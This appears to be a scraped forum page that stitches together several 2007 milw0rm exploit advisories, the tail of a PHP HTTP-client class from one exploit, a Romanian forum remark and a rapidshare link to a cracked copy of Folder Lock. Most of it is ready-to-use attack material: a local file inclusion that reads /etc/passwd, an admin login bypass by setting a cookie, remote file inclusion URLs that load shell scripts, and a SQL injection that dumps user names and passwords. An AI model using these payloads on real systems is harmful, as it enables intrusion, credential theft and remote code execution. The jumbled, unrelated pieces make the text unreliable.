(.*)/i",$carr[$z],$cookarr)) { $cookie[] = preg_replace("/expires=(.*)(GMT||UTC)(\S*)$/i","",preg_replace("/path=(.*)/i","",$cookarr[1])); } } for($i=0;$i<count($cookie);$i++) { preg_match("/(\S*)=(\S*)(|;)/",$cookie[$i],$matches); $cookn = $matches[1]; $cookv = $matches[2]; $this->addcookie($cookn,$cookv); } } /** * This function is called by the get()/post() functions. * You don't have to call it. * * @param string $urltarg */ private function target($urltarg) { if(!preg_match("/^http:\/\/(.*)\//",$urltarg)) $urltarg .= "/"; $this->url=$urltarg; $array = explode("/",str_replace("http://","",preg_replace("/:(\d+)/","",$urltarg))); $this->host=$array[0]; preg_match("/:(\d+)\//",$urltarg,$matches); $this->port=empty($matches[1]) ? 80 : $matches[1]; $temp = str_replace("http://","",preg_replace("/:(\d+)/","",$urltarg)); preg_match("/\/(.*)\//",$temp,$matches); $this->path=str_replace("//","/","/".$matches[1]."/"); if($this->port > 65535) die("Error: Invalid port number"); } /** * If you call this function, the script will * extract all "Set-Cookie" headers values * and it will automatically add them into the "Cookie" header * for all next requests. * * $this->cookiejar(1); // enabled * $this->cookiejar(0); // disabled * */ public function cookiejar($code) { if($code===0) $this->cookiejar=''; if($code===1) $this->cookiejar=1; else { $this->getcookie($code); } } /** * If you call this function, the script will * follow all redirections sent by the server. * * $this->allowredirection(1); // enabled * $this->allowredirection(0); // disabled * * @return $this->get($locationresponse) */ public function allowredirection($code) { if($code===0) $this->allowredirection=''; if($code===1) $this->allowredirection=1; else { if(preg_match("/(location|content-location|uri): (.*)/i",$code,$codearr)) { $location = str_replace(chr(13),'',$codearr[2]); if(!eregi("://",$location)) { return $this->get("http://".$this->host.$this->path.$location); } else { return $this->get($location); } } else { return $code; } } } /** * This function allows you to reset some parameters: * * $this->reset(header); // headers cleaned * $this->reset(cookie); // cookies cleaned * $this->reset(); // clean all parameters * * @param string $func */ public function reset($func='') { switch($func) { case "header": $this->header=''; break; case "cookie": $this->cookie=''; break; default: $this->cookiejar=''; $this->header=''; $this->cookie=''; $this->allowredirection=''; $this->agent=''; break; } } } ?> # milw0rm.com [2007-05-05]

\\\|/// \\ - - // ( @ @ ) ----oOOo--(_)-oOOo-------------------------------------------------- Portal : Archangel Weblog version 0.90.02 Home : [url]http://www.archangelmgt.com/weblog.shtml[/url] Download : [url]http://www.archangelmgt.com/Archangel_Weblog_v090_02.zip[/url] Author : Dj7xpl / [email]Dj7xpl@2600.ir[/email] HomePage : [url]http://Dj7xpl.2600.ir[/url] Type : Local File Inclusion & Login Page Bypass By Cookie ----ooooO-----Ooooo-------------------------------------------------- ( ) ( ) \ ( ) / \_) (_/ +---------------------------------------------------------------------------------------------+ Local File Include : [url]http://[TARGET]/[/url][PATH]/index.php?index=[Local File]%00 [url]http://Target.com/blog/index.php?index=../../../../etc/passwd%00[/url] +---------------------------------------------------------------------------------------------+ +---------------------------------------------------------------------------------------------+ Edit Cookie : Host : Target Name : ba_admin Value : 1 <------ (Admin User Id) And Go To Admin Panel : [url]http://[Target]/[/url][Path]/Admin/ +---------------------------------------------------------------------------------------------+ # milw0rm.com [2007-05-05]

############################################################################################## ############################################################################################## #NoAh 0.9 The PHP Content Architect <= Remote File Inclusion Vulnerability # #Dork: # #Vuln Code ################################################################################### # #ERROR:noah/modules/noevents/templates/mfa_theme.php # <?php include($tpls[1]); ?> # #BUG: # #Example:[url]http://site.com/path/noah/modules/noevents/templates/mfa_theme.php?tpls[/url][1]=[[Sh3LL Script]] # #Script Download ############################################################################# #[url]http://sourceforge.net/project/showfiles.php?group_id=131995&package_id=148681&release_id=318628[/url] ############################################################################################## # #kezzap66345@hotmail.com # #Special Thanks:##### x0r0n ##### ajan ##### siircicocuk ##################################### ############################################################################################## ############################################################################################## # milw0rm.com [2007-05-06]

================================================= + + Xoops wfquotes module v1.0 0 Remote Blind SQL Injection + ================================================= + + Bulan: Cyber-Ssecurity + ================================================= + + Exploit: + /modules/wfquotes/index.php?op=cat&c=1/**/UNION/**/SELECT/**/0,uname,pass,3,4,5/**/FROM/**/xoops_users/**/LIMIT/**/1,1/* + ================================================= # milw0rm.com [2007-05-06]

# Wikivi5 Remote File Inclusion Vulnerability # D.Script: [url]http://wiki.vi5.org/fichiers/Wikivi5.zip[/url] # Discovered by: GolD_M = [Mahmood_ali] # Homepage: [url]http://www.Tryag.cc[/url] # Exploit:[Path]/handlers/page/show.php?sous_rep=Shell # Greetz To: Tryag-Team ....## # milw0rm.com [2007-05-06]

vreau si eu un avatar cu Ras ... daca poti

Lock Your Folders and protect them!!! Folder Lock is a fast file-security program that can password-protect, lock, hide and encrypt any number of files, folders, drives, pictures and documents in seconds. Protected files are hidden, undeletable, inaccessible and highly secure. It hides files from kids, friends and co-workers, safeguards them from viruses, trojans, worms and spyware, and even protects them from networked PCs, cable users and hackers. Files can also be protected on USB Flash Drives, Memory Sticks, CD-RW, floppies and notebooks. Protection works even if files are taken from one PC to another on a removable disk, without the need to install any software. It locks files in Windows, DOS and even Safe Modes. Additional Options include Stealth Mode, Hacker Attempt Monitoring, Shred files, AutoLock, Auto Shutdown PC, Lock your PC, Erase PC tracks, 256-bit Blowfish Encryption and Context Menu in Explorer. It is Windows Vista/2003/XP/2000/NT/Me/98/98S compatible and works on all kinds of disk types like FAT16, FAT32, NTFS. Folder Lock is the most downloaded file-security program in the market today. Download: http://rapidshare.com/files/29854864/Folder_Lock_v5.7.0__Vista_Ready_.rar

#PHPtree Remote file inclusion (s_dir) #Download script : [url]http://www.phptree.de/content/download/public/phptree/phptree_v1.3.zip[/url] #Thanks Str0ke #Exploit #[url]http://site.com/[/url][phptree_path]/plugin/HP_DEV/cms2.php?s_dir=shell.txt? #Discovered by : ThE TiGeR #Miro_Tiger100[at]Hotmail[dot]com # milw0rm.com [2007-05-05]